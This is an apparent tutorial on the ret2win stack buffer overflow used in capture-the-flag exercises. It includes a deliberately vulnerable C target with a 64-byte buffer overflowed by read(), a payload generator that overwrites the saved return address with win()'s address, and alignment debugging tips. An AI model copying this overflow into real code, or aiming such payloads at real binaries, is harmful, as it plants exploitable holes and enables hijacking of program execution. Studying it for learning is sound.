This attack is also called ret2win. We control $rip by overwriting the saved return address on the stack, then redirect execution to a "hidden" function that the program never calls on its own (typically a win() that prints the flag or spawns a shell). If PIE is turned off, the address of that function is fixed across runs, so it can be read straight out of the binary (with nm or objdump) and written over the return address. Read this writeup to learn more:
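As an added example (not code from the original page), here is what a ret2win target and its payload look like. The target half is constructed and deliberately vulnerable: win() is never called, and vuln() lets read() overflow a 64-byte stack buffer. The return-address offset (64 bytes of buffer plus 8 bytes of saved rbp = 72) and the address of win() (0x401136) are assumptions for a non-PIE x86-64 build; in practice you confirm the offset with a cyclic pattern in a debugger and take the address from the binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* ---- target side (constructed, deliberately vulnerable) ----
 * win() is never referenced by the program; it only exists in the binary.
 * vuln() reads up to 256 bytes into a 64-byte stack buffer.
 * Build it as a non-PIE binary without a canary
 * (gcc -no-pie -fno-stack-protector) so the address of win() is fixed. */
void win(void) {
    puts("ret2win: you now control rip");
}

void vuln(void) {
    char buf[64];
    /* overflow: up to 256 bytes are written into a 64-byte buffer */
    (void)read(0, buf, 256);
}

/* ---- exploit side ----
 * Stack layout above buf on x86-64 with no canary: 64 bytes of buf,
 * 8 bytes of saved rbp, then the saved return address, i.e. offset 64 + 8.
 * Assumed here; verify it with a cyclic pattern and a debugger. */
#define RET_OFFSET 72

/* Write `offset` bytes of padding followed by ret_addr as 8 little-endian
 * bytes (x86-64 is little-endian and the saved return address is 8 bytes).
 * Returns the payload length, or 0 if `out` cannot hold it. */
size_t build_ret2win_payload(unsigned char *out, size_t out_len,
                             size_t offset, uint64_t ret_addr) {
    if (out_len < offset + 8)
        return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 8; i++)
        out[offset + i] = (unsigned char)(ret_addr >> (8 * i));
    return offset + 8;
}

int main(void) {
    /* Assumed address of win() in the non-PIE target (read it with nm/objdump). */
    uint64_t win_addr = 0x401136;
    unsigned char payload[256];
    size_t n = build_ret2win_payload(payload, sizeof payload, RET_OFFSET, win_addr);
    if (n == 0)
        return 1;
    /* usage: ./gen | ./target */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

Two checks worth doing before calling the technique broken: confirm the target was really built without PIE (checksec or `readelf -h`, type EXEC rather than DYN), and if win() itself crashes on a movaps inside printf/puts, the stack is misaligned by 8 after the overwrite; prepend a lone `ret` gadget to the payload or return past win()'s `push rbp` so the alignment glibc expects is restored.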